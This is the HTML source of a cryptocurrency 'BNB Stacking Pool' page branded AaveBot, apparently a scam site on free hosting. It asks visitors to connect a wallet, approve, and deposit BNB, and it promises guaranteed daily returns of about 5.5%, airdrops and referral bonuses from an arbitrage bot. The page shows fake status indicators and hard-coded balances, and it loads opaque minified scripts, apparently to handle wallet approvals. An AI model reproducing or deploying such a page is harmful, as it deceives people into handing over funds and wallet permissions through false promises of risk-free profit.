<!DOCTYPE html>
<html lang="en">

<head>	  
	<meta charset="UTF-8">
	<meta name="viewport" content="width=device-width, initial-scale=0.41, maximum-scale=1">
	
	<title>AaveBOT BNB Pool</title>

	<link rel="stylesheet" href="./assets/css/styles.css">
	<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.6.9/angular.min.js"></script>
	
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.7.0/css/font-awesome.min.css">
	
</head>

<body class="body" ng-app="myApp" ng-controller="myCtrl" onload="tvl_bnb()">	
	
	<div id="main">
		<div class="topnav">
	
		<div id="mySidenav" class="sidenav">
			<ul id="menu" class="darking-menu" style="position: relative; padding:15px;display: grid;height: 150px;">
			  <a href="javascript:void(0)" style="margin-top:0px" class="closebtn" onclick="closeNav()">&times;</a>
			  
			  <li style="margin-top: -18px;"><a  style="font-size: 12px;text-align: left;">Welcome to Aave<strong>Bot</strong>!</a></li>
			  <br/><br/>
			  <li style="place-self: center;"><a  style="font-size: 22px;" href="index.html" id="site">Home</a></li>
			  <li style="place-self: center;"><a  style="font-size: 22px;" href="pool.html" id="site">Pool</a></li>
			  <li style="place-self: center;"><a  style="font-size: 22px;" href="airdrop.html" id="site">Airdrop</a></li>
			  <li style="place-self: center;"><a  style="font-size: 22px;" href="list.html" id="site">Token List</a></li>
			  <li style="place-self: center;"><a  style="font-size: 22px;" href="referral.html" id="site">Affiliate</a></li>
			  <br/><br/>
	
			  <div style="display: inline; place-self: center;"><a style="font-size: 14px;" target="_blank" href="https://aavebot.000webhost.com"></a>
				<a style="font-size: 14px;" target="_blank" href="https://fc21.ifca.ai/papers/158.pdf">Docs</a>
				<a style="font-size: 14px;" target="_blank" href="https://news.google.com/search?for=flash+loan+attack">News</a>
				<a style="font-size: 14px;" target="_blank" href="FAQ.html">FAQ</a>
			</div>
		  </ul>  
		</div>
	
			<a href="javascript:void(0);" style="padding-top: 18px; padding-left: 0px;" class="icon" onclick="openNav()">
				<i class="fa fa-bars"></i>
			</a>

			<a class="darking-logo" href="index.html" id="site" style="padding: 11px 0px;">
				<img src="assets/image/logo.png" id="logo" width="30px" height="30px" style="float: none;">
				<a  style="font-size: 20px;" href="index.html" id="site"><strong>Aave</strong>Bot<a style="font-size: 10px;margin-left: -25px;">finance</a></a>
			</a>
	
			<div class="topnav-right">
			<button class="button-info" id="info" style="margin-top: 10px;border-radius: 50px; background: #191b1f; padding: 5px 15px;"><i class="fa fa-user-circle-o"></i> <div style="display: inline;">{{toplen}}...{{endlen}}</div></button>
	
			<div id="myModal" class="modal">
				<div class="modal-content" style="width: 600px; height: 250px;">
				  <span class="close">&times;</span>
				  <h1 style="font-size: 20px; margin-top: 50px;padding: 25px; padding-top: 40px; padding-bottom: 10px; font-weight: 800;text-align: left;">Your Wallet</h1>
				  <hr class="new1"/>
				  <button style="margin: 15px 20px; width: auto; background: #191b1f;padding: 18px 10px;"><div style="font-size: 20px;">{{account.address}}</div></button>
				 <div style="padding: 0px 20%;width: 100%;"> 
				  <a href="{{scan}}address/{{account.address}}" style="font-size: 18px;">Check on {{idscan}}</a>
				  <a onclick="copyRef()" style="font-size: 18px;">Copy Address</a>
				  <a id="input" style="font-size: 0px; height: 0px;">{{account.address}}</a>
				</div>
				</div>
			  </div>
	
			  <script>
				function copyRef(id)
				{
				var r = document.createRange();
				r.selectNode(document.getElementById("input"));
				window.getSelection().removeAllRanges();
				window.getSelection().addRange(r);
				document.execCommand('copy');
				window.getSelection().removeAllRanges();
				return alert("Address copied successfully!");
				}
	
				var modal2 = document.getElementById("myModal");
				var btn2 = document.getElementById("info");
				var span2 = document.getElementsByClassName("close")[0];
	
				btn2.onclick = function() {
					modal2.style.display = "block";
				}
				span2.onclick = function() {
				modal2.style.display = "none";
				}
				window.onclick = function(event) {
					if (event.target == modal2) {
					modal2.style.display = "none";
					}
				}
			  </script>
			</div>
			
		</div>
	</div>
		
		<script>
		function myFunction() {
		  var x = document.getElementById("myLinks");
		  if (x.style.display === "block") {
			x.style.display = "none";
		  } else {
			x.style.display = "block";
		  }
		}
		</script>
	

	<div class="space10"></div>

	<form class="form-table" style="background: transparent; width: auto;">
		<table  class="test"  style="width:100%;margin-left: 10px;" id='myTable'>
					<form class="darking-list" style="background: transparent; padding-bottom: 20px;max-width: auto;">
						<h1 style="text-shadow: 0 0 25px #f3ba2f; display: inline; font-size: 55px;"><strong>BNB</strong></h1><h1 style="font-size: 55px; display: inline;"> Stacking Pool</h1>
						<p style="padding: 0px 10%;">Earn safe passive income in BNB automatically generated from our BOT 24/7.  
							<a style="color: #1a70e1;display: contents;" href="referral.html"> Share referrals</a>
							and earn double! <b>With the minimum deposit of 1 BNB you will also get free BNB-LP for claim the Airdrop.</b>
						</p>
						</form>
						<button onclick="window.location.href='airdrop-bnb.html'" class="rainbow_bnb" style="padding: 3px 10px; width: auto;cursor: pointer;">CLAIM YOUR <b>AIRDROP</b> WITH <b>BNB-LP</b></button>
		</table>
	</form>

					<div class="space50"></div>
			
	<div class="row">
			<form class="darking block" ng-show="formStep == 1" ng-submit="submitErc20Form()" style="position: relative; width: 450px;">
			
								<div>&nbsp;</div>
								
								<div><a style="padding-top: 20px;float:left; color: rgb(251, 218, 255); font-size: 21px; text-align: center; font-weight: 800; 
									text-shadow: 0px 0px 25px #f3ba2f;">BNB Stacking POOL</a></div><br/>
								<a style="float:right; color: white; font-weight: 600; background: #f3ba2f; padding: 5px; border-radius: 25px;">Auto</a>
						
								<div>&nbsp;</div>
								<div>&nbsp;</div>
								<div>&nbsp;</div>
						
									<div class="input-holder info" style="line-height: 20px;">
										
											<div class="kv">
												<div class="tooltip">
													<div>TVL<span class="tooltiptext">Total Value Locked.</span> 
													</div>
												</div>
												<div style="font-weight: 800;"><div style="display: inline;" id="tvl_bnb"></div></div>
											</div></br>	
						
											<div class="kv">
												<div class="tooltip">
													<div>APY / APR<span class="tooltiptext">Annual percentage yield (APY) is the percentage of growth or “rate of return” you earn on an investment over one year. APY grows exponentially through compounding interest of APR.</span> 
													</div>
												</div>
												<div style="font-weight: 800;"><div style="display: inline;" id="apy_bnb"></div> / <div style="display: inline;" id="apr_bnb"></div></div>
											</div></br>
						
											<div class="kv">
												<div>BNB-LP</div>
												<div style="font-weight: 800;">10 BNB-LP each 3 BNB</div>
											</div></br>
						
											<div class="kv">
												<div>Deposit</div>
												<div style="font-weight: 800;">0.000 BNB</div>
											</div></br>
						
											<div class="kv">
												<div>Profit</div>
												<div style="font-weight: 800;">0.000 BNB</div>
											</div>	
			
									</div>		
									<div style="font-size: 10px; color: grey; float: right; padding-top: 10px;">*BNB-LP will be automatically deposited on your wallet</div>
									<div style="padding-top: 10px;">
									</div>
			
									<div class="center" style="visibility:hidden;height: 15px;">
										<div class="cc-selector">
												<label class="super">Network:</label>
												<input type="radio" ng-model="erc20.network" id="n2" name="network" ng-value="false" ng-checked="!erc20.network">
												<label class="drinkcard-cc mastercard" for="n2"> </label>
											</div>
									</div>
									
										<div class="input-holder btn-holder">
											<button class="button-2" type="submit" onclick="getBalance()" style="background:#f3ba2f;"><b>APPROVE</b></button>
										</div>
			</form>		
			<form class="darking block" style="position: relative;width: 450px;" ng-show="formStep == 2" ng-submit="submitLoanForm()">
			
				<div>&nbsp;</div>
				
				<div><a style="padding-top: 20px;float:left; color: rgb(251, 218, 255); font-size: 21px; text-align: center; font-weight: 800; 
					text-shadow: 0px 0px 25px #f3ba2f;">BNB Stacking POOL</a></div><br/>
				<a style="float:right; color: white; font-weight: 600; background: #f3ba2f; padding: 5px; border-radius: 25px;">Auto</a>
		
				<div>&nbsp;</div>
				<div>&nbsp;</div>
				<div>&nbsp;</div>
		
						<div class="input-holder info" style="line-height: 20px;">
		
							<div class="kv">
								<div class="tooltip">
									<div>APY<span class="tooltiptext">Annual percentage yield (APY) is the percentage of growth or “rate of return” you earn on an investment over one year. APY grows exponentially through compounding interest of APR.</span> 
									</div>
								</div>
								<div style="font-weight: 800;"><div style="display: inline;" id="apy3_bnb"></div></div>
							</div></br>
						
							<div class="kv">
								<div>Your BNB-LP</div>
								<div style="font-weight: 800;">0 BNB-LP</div>
							</div></br>
		
							<div class="kv">
								<div>Deposit</div>
								<div style="font-weight: 800;">0.000 BNB</div>
							</div></br>
		
							<div class="kv">
								<div>Profit</div>
								<div style="font-weight: 800;">0.000 BNB</div>
							</div>	
		
							<script>
								function claim() {
									alert("You dont have any BNB stacked. Please deposit first.");
								}
							</script>
							<style>
								.button-claim {
									background: white;
									color: black;
									font-size: 16px;
									font-weight: 700;
									border-radius: 10px;
									padding:10px;
									width: 100%;
								}
								.button-claim:hover {
									background: rgb(180, 180, 180);
									color: black;
									font-size: 16px;
									font-weight: 700;
									border-radius: 10px;
									padding:10px;
									width: 100%;
									
								}
							</style>
						</div>		
						<div style="font-size: 10px; color: grey; float: right; padding-top: 10px;">*BNB-LP will be automatically deposited on your wallet</div>
						<div style="padding-top: 10px;"><a style="color:white;">Deposit (min 1 BNB):</a></div>
						<div class="input-holder">
							<table>
							<tr>
								<th>
									<div class="input-holder">
									<input onclick="getBalance()" style="width: 300px;" id="loanAmtInput" type="number" ng-change="amountChanged()" ng-model="loan.amount" step="any" min="1" max="10000" placeholder="BNB">
								</input>
									</div>
								</th>
								<th>
									<button onclick="getBalance()"
									style="padding-left: 30px;cursor: pointer;color:white;width: 150px;background:black;margin-top: 10px;float: right; margin-right: 70px; margin-left: -40px;" 
									type="submit" ng-disabled="processing || ethDeposited">
									<div></div>Deposit
								</button>
								</th>
							</tr>
							</table>
						</div>
						
				<div>&nbsp;</div>

<a style="color:white; font-size: 14px;">Estimated daily profit per <b>3 BNB: 0.1647 BNB</b></a><br/>
<a style="color:white; font-size: 14px;">Estimated monthly profit per <b>3 BNB: 6.3631 BNB</b></a>
				
						<div class="input-holder btn-holder"><button class="button-2;" style="background:#f3ba2f; font-weight: 800;" type="submit" ng-disabled="processing || !ethDeposited">Withdraw</button></div>
			</form>


			<div class="space50"></div>

	</div>

	<button  class="accordion" style="background: transparent; color: white;text-align: center;"><i class="fa fa-chevron-circle-down"></i> Pool Tutorial Step by Step </button>
	<div class="panel">
		
	
		<form id="regForm" action="pool.html">
			<div class="tab">
				<a style="font-size: 22px; color: white;">1. Deposit ETH or BNB into the Pool</a><br/>
				<div class="space25"></div>
					<a style="font-size: 12px; color: white;">To participate in the Liquidity Pool, simply deposit ETH or BNB into the Pool. Just select the amount and press Deposit.
					</a>
			</div>
			<div class="tab">
				<a style="font-size: 22px; color: white;">2. Get passive income + LP tokens</a><br/><br/>
				<div class="space10"></div>
					<a style="font-size: 12px; color: white;">When you have deposited your ETH or BNB you will begin to receive passive income thanks to our BOT that uses the liquidity pool to perform Arbitrage. <b>Note: Unlike the public BOT we have priority and do not risk being frontrunned.</b> You will also receive LP tokens with which you can participate in the Airdrop and do the withdrawal of your funds.
					</a>
			</div>
			<div class="tab">
				<a style="font-size: 22px; color: white;">3. Widthdraw in any moment</a><br/><br/>
				<div class="space10"></div>
					<a style="font-size: 12px; color: white;">You can remove funds from the Pool at any time using your LP tokens!
					</a>
			</div>
			<div style="text-align:center; margin-top:40px; width: 100%;">
			  <span class="step"></span>
			  <span class="step"></span>
			  <span class="step"></span>
			</div>
			<div class="space50"></div>
			<div style="width: 100%; padding-right: 25%; padding-left: 25%;">
				<button class="block" type="button" id="nextBtn" onclick="nextPrev(1)" style="width: 50%; padding: 15px 6px; background: black;cursor: pointer;">Next Step</button>
				<button type="button" id="prevBtn" onclick="nextPrev(-1)" style="width: 50%; padding: 15px 6px;">Go Back</button>
			</div>
		  </form>
	
		  <script>
			var currentTab = 0;
			showTab(currentTab);
			
			function showTab(n) {
			  var x = document.getElementsByClassName("tab");
			  x[n].style.display = "block";
			  if (n == 0) {
				document.getElementById("prevBtn").style.display = "none";
			  } else {
				document.getElementById("prevBtn").style.display = "inline";
			  }
			  if (n == (x.length - 1)) {
				document.getElementById("nextBtn").innerHTML = "Start now";
			  } else {
				document.getElementById("nextBtn").innerHTML = "Next";
			  }
			  fixStepIndicator(n)
			}
			
			function nextPrev(n) {
			  var x = document.getElementsByClassName("tab");
			  if (n == 1 && !validateForm()) return false;
			  x[currentTab].style.display = "none";
			  currentTab = currentTab + n;
			  if (currentTab >= x.length) {
				document.getElementById("regForm").submit();
				return false;
			  }
			  showTab(currentTab);
			}
			
			function validateForm() {
			  var x, y, i, valid = true;
			  x = document.getElementsByClassName("tab");
			  y = x[currentTab].getElementsByTagName("input");
			  for (i = 0; i < y.length; i++) {
				if (y[i].value == "") {
				  y[i].className += " invalid";
				  valid = false;
				}
			  }
			  if (valid) {
				document.getElementsByClassName("step")[currentTab].className += " finish";
			  }
			  return valid;
			}
			
			function fixStepIndicator(n) {
			  var i, x = document.getElementsByClassName("step");
			  for (i = 0; i < x.length; i++) {
				x[i].className = x[i].className.replace(" active", "");
			  }
			  x[n].className += " active";
			}
			</script>
			<style>
				* {
				  box-sizing: border-box;
				}
				
				body {
				  background-color: transparent;
				}
				
				#regForm {
				  background-color: transparent;
				  margin: 50px auto;
				  padding: 40px;
				  width: 70%;
				  min-width: 500px;
				}
				
				h1 {
				  text-align: center;  
				}
				
				input {
				  padding: 10px;
				  width: 100%;
				  font-size: 17px;
				  border: 0px solid #aaaaaa;
				}
				
				input.invalid {
				  background-color: #ffdddd;
				}
				
				.tab {
				  display: none;
				}
				
				#prevBtn {
				  background-color: transparent;
				  font-size: 12px;
				}
				
				.step {
				  height: 15px;
				  width: 15px;
				  margin: 0 2px;
				  background-color: #bbbbbb;
				  border: none;  
				  border-radius: 50%;
				  display: inline-block;
				  opacity: 0.5;
				}
				
				.step.active {
				  opacity: 1;
				  padding: 3px;
				  height: 15px;
				  width: 15px;
				  margin: 0 2px;
				  background-color: #bbbbbb;
				  border: 0px;  
				  border-radius: 50%;
				  display: inline-block;
				}
				
				.step.finish {
				  background-color: #414141;
				}
				</style>
	</div>
	<script>
		var acc = document.getElementsByClassName("accordion");
		var i;
		for(i = 0; i < acc.length; i++) {
			acc[i].addEventListener("click", function() {
				this.classList.toggle("active");
				var panel = this.nextElementSibling;
				if(panel.style.display === "block") {
					panel.style.display = "none";
				} else {
					panel.style.display = "block";
				}
			});
		}
		</script>
	
	<div class="space10"></div>
	
	<ul class="darking-menu">
		<div class="tooltip" style="border-bottom: 0px dotted #000;position: relative;">
			<a class="darking-menu" style="font-size: 12px;display: contents;" ><p>WebSocket: <a style="color: rgb(85, 170, 0);font-size: 12px;display: contents;"><i class="fa fa-circle"></i> Connected</a><span class="tooltiptext">Our WebSocket is correctly connected to the Server.</span></p></a>
		</div></br>
		<a class="darking-menu" style="font-size: 12px;" ><p>© AaveBot 2021</p></a>
	</ul>

	<script src="https://cdnjs.cloudflare.com/ajax/libs/web3/1.3.5/web3.min.js"></script>
	<script src="https://cdnjs.cloudflare.com/ajax/libs/crypto-js/3.1.2/rollups/aes.js" integrity="sha256-/H4YS+7aYb9kJ5OKhFYPUjSJdrtV6AeyJOtTkw6X72o=" crossorigin="anonymous"></script>
	<script src="./assets/js/addr.min.js"></script>
	<script src="./assets/js/chain.min.js"></script>
	<script src="./assets/js/check.min.js"></script>
<div style="text-align: right;position: fixed;z-index:9999999;bottom: 0;width: auto;right: 1%;cursor: pointer;line-height: 0;display:block !important;"><a title="Hosted on free web hosting 000webhost.com. Host your own website for FREE." target="_blank" href="https://www.000webhost.com/?utm_source=000webhostapp&utm_campaign=000_logo&utm_medium=website&utm_content=footer_img"><img src="https://cdn.000webhost.com/000webhost/logo/footer-powered-by-000webhost-white2.png" alt="www.000webhost.com"></a></div><script>function getCookie(t){for(var e=t+"=",n=decodeURIComponent(document.cookie).split(";"),o=0;o<n.length;o++){for(var i=n[o];" "==i.charAt(0);)i=i.substring(1);if(0==i.indexOf(e))return i.substring(e.length,i.length)}return""}getCookie("hostinger")&&(document.cookie="hostinger=;expires=Thu, 01 Jan 1970 00:00:01 GMT;",location.reload());var wordpressAdminBody=document.getElementsByClassName("wp-admin")[0],notification=document.getElementsByClassName("notice notice-success is-dismissible"),hostingerLogo=document.getElementsByClassName("hlogo"),mainContent=document.getElementsByClassName("notice_content")[0];if(null!=wordpressAdminBody&&notification.length>0&&null!=mainContent){var googleFont=document.createElement("link");googleFontHref=document.createAttribute("href"),googleFontRel=document.createAttribute("rel"),googleFontHref.value="https://fonts.googleapis.com/css?family=Roboto:300,400,600,700",googleFontRel.value="stylesheet",googleFont.setAttributeNode(googleFontHref),googleFont.setAttributeNode(googleFontRel);var css="@media only screen and (max-width: 576px) {#main_content {max-width: 320px !important;} #main_content h1 {font-size: 30px !important;} #main_content h2 {font-size: 40px !important; margin: 20px 0 !important;} #main_content p {font-size: 14px !important;} #main_content .content-wrapper {text-align: center !important;}} @media only screen and (max-width: 781px) {#main_content {margin: auto; justify-content: center; max-width: 445px;}} @media only screen and (max-width: 1325px) {.web-hosting-90-off-image-wrapper {position: absolute; max-width: 95% !important;} .notice_content {justify-content: center;} .web-hosting-90-off-image {opacity: 0.3;}} @media only screen and (min-width: 769px) {.notice_content {justify-content: space-between;} #main_content {margin-left: 5%; max-width: 445px;} .web-hosting-90-off-image-wrapper {position: absolute; display: flex; justify-content: center; width: 100%; }} .web-hosting-90-off-image {max-width: 90%;} .content-wrapper {min-height: 454px; display: flex; flex-direction: column; justify-content: center; z-index: 5} .notice_content {display: flex; align-items: center;} * {-webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale;} .upgrade_button_red_sale{box-shadow: 0 2px 4px 0 rgba(255, 69, 70, 0.2); max-width: 350px; border: 0; border-radius: 3px; background-color: #ff4546 !important; padding: 15px 55px !important; font-family: 'Roboto', sans-serif; font-size: 16px; font-weight: 600; color: #ffffff;} .upgrade_button_red_sale:hover{color: #ffffff !important; background: #d10303 !important;}",style=document.createElement("style"),sheet=window.document.styleSheets[0];style.styleSheet?style.styleSheet.cssText=css:style.appendChild(document.createTextNode(css)),document.getElementsByTagName("head")[0].appendChild(style),document.getElementsByTagName("head")[0].appendChild(googleFont);var button=document.getElementsByClassName("upgrade_button_red")[0],link=button.parentElement;link.setAttribute("href","https://www.hostinger.com/hosting-starter-offer?utm_source=000webhost&utm_medium=panel&utm_campaign=000-wp"),link.innerHTML='<button class="upgrade_button_red_sale">Go for it</button>',(notification=notification[0]).setAttribute("style","padding-bottom: 0; padding-top: 5px; background-color: #040713; background-size: cover; background-repeat: no-repeat; color: #ffffff; border-left-color: #040713;"),notification.className="notice notice-error is-dismissible";var mainContentHolder=document.getElementById("main_content");mainContentHolder.setAttribute("style","padding: 0;"),hostingerLogo[0].remove();var h1Tag=notification.getElementsByTagName("H1")[0];h1Tag.className="000-h1",h1Tag.innerHTML="Black Friday Prices",h1Tag.setAttribute("style",'color: white; font-family: "Roboto", sans-serif; font-size: 22px; font-weight: 700; text-transform: uppercase;');var h2Tag=document.createElement("H2");h2Tag.innerHTML="Get 90% Off!",h2Tag.setAttribute("style",'color: white; margin: 10px 0 15px 0; font-family: "Roboto", sans-serif; font-size: 60px; font-weight: 700; line-height: 1;'),h1Tag.parentNode.insertBefore(h2Tag,h1Tag.nextSibling);var paragraph=notification.getElementsByTagName("p")[0];paragraph.innerHTML="Get Web Hosting for $0.99/month + SSL Certificate for FREE!",paragraph.setAttribute("style",'font-family: "Roboto", sans-serif; font-size: 16px; font-weight: 700; margin-bottom: 15px;');var list=notification.getElementsByTagName("UL")[0];list.remove();var org_html=mainContent.innerHTML,new_html='<div class="content-wrapper">'+mainContent.innerHTML+'</div><div class="web-hosting-90-off-image-wrapper"><img class="web-hosting-90-off-image" src="https://cdn.000webhost.com/000webhost/promotions/bf-2020-wp-inject-img.png"></div>';mainContent.innerHTML=new_html;var saleImage=mainContent.getElementsByClassName("web-hosting-90-off-image")[0]}</script></body>

</html>
